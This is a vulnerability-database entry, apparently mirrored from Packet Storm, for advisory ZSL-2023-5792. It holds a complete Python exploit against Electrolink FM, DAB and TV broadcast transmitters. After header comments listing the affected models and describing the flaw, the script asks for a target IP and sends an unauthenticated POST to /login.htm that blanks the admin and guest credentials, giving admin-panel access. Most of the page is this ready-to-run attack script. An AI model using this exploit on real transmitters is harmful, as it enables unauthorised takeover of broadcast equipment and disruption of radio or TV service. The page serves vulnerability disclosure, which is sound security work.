Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormLiquidWorm, zeroscience.mkPACKETSTORM:174877
HistoryOct 02, 2023 - 12:00 a.m.

Electrolink FM/DAB/TV Transmitter Remote Authentication Removal

2023-10-0200:00:00
LiquidWorm, zeroscience.mk
packetstormsecurity.com
135
electrolink
transmitter
remote authentication
vulnerability
admin panel
account takeover
arbitrary password change
JSON
`#!/usr/bin/env python  
#  
#  
# Electrolink FM/DAB/TV Transmitter Remote Authentication Removal  
#  
#  
# Vendor: Electrolink s.r.l.  
# Product web page: https://www.electrolink.com  
# Affected version: 10W, 100W, 250W, Compact DAB Transmitter  
# 500W, 1kW, 2kW Medium DAB Transmitter  
# 2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter  
# 100W, 500W, 1kW, 2kW Compact FM Transmitter  
# 3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter  
# 15W - 40kW Digital FM Transmitter  
# BI, BIII VHF TV Transmitter  
# 10W - 5kW UHF TV Transmitter  
# Web version: 01.09, 01.08, 01.07  
# Display version: 1.4, 1.2  
# Control unit version: 01.06, 01.04, 01.03  
# Firmware version: 2.1  
#  
# Summary: Since 1990 Electrolink has been dealing with design and  
# manufacturing of advanced technologies for radio and television  
# broadcasting. The most comprehensive products range includes: FM  
# Transmitters, DAB Transmitters, TV Transmitters for analogue and  
# digital multistandard operation, Bandpass Filters (FM, DAB, ATV,  
# DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial  
# switches, Manual patch panels, RF power meters, Rigid line and  
# accessories. A professional solution that meets broadcasters needs  
# from small community television or radio to big government networks.  
#  
# Compact DAB Transmitters 10W, 100W and 250W models with 3.5"  
# touch-screen display and in-built state of the art DAB modulator,  
# EDI input and GPS receiver. All transmitters are equipped with a  
# state-of-the art DAB modulator with excellent performances,  
# self-protected and self-controlled amplifiers ensure trouble-free  
# non-stop operation.  
#  
# 100W, 500W, 1kW and 2kW power range available on compact 2U and  
# 3U 19" frame. Built-in stereo coder, touch screen display and  
# efficient low noise air cooling system. Available models: 3kW,  
# 5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters  
# with fully broadband solid state amplifiers and an efficient  
# low-noise air cooling system.  
#  
# FM digital modulator with excellent specifications, built-in  
# stereo and RDS coder. Digital deviation limiter together with  
# ASI and SDI inputs are available. These transmitters are ready  
# for ISOFREQUENCY networks.  
#  
# Available for VHF BI and VHF BIII operation with robust desing  
# and user-friendly local and remote control. Multi-standard UHF  
# TV transmitters from 10W up to 5kW with efficient low noise air  
# cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC  
# and ISDB-Tb available.  
#  
# Desc: The application is vulnerable to an unauthenticated  
# parameter manipulation that allows an attacker to set the  
# credentials to blank giving her access to the admin panel.  
# Also vulnerable to account takeover and arbitrary password  
# change.  
#  
# Tested on: Mbedthis-Appweb/12.5.0  
# Mbedthis-Appweb/12.0.0  
#  
#  
# Vulnerability discovered by Neurogenesia  
# Macedonian Information Security Research & Development Laboratory  
# Zero Science Lab - https://www.zeroscience.mk - @zeroscience  
#  
#  
# Advisory ID: ZSL-2023-5792  
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5792.php  
#  
#  
# 30.06.2023  
#  
#  
  
  
import datetime  
import requests  
  
dt = datetime.datetime.now()  
dt = dt.strftime('%d.%m.%Y %H:%M:%S')  
nul = ''  
  
print('Starting transmitter exploit at', dt)  
  
ip = input('Enter transmitter ip: ')  
if 'http' not in ip:  
ip = 'http://' + ip  
  
ep = '/login.htm'  
url = ip + ep  
  
signature = {'Accept-Encoding' : 'gzip, deflate',  
'Accept-Language' : 'ku-MK,en;q=0.1806',  
'User-Agent' : 'Broadcastso/B.B',  
'Connection' : 'keep-alive'  
}  
# ----------------- Line breaker v0.17 -----------------  
postd = { 'adminuser' : nul,  
'guestuser' : nul,  
'adminpassword' : nul,  
'guestpassword' : nul  
}  
  
print('Removing security control...')  
r = requests.post(url, data = postd, headers = signature)  
if r.status_code == 200:  
print('Done. Go and "Login".')  
else:  
print('Error')  
exit(-4)  
`
JSON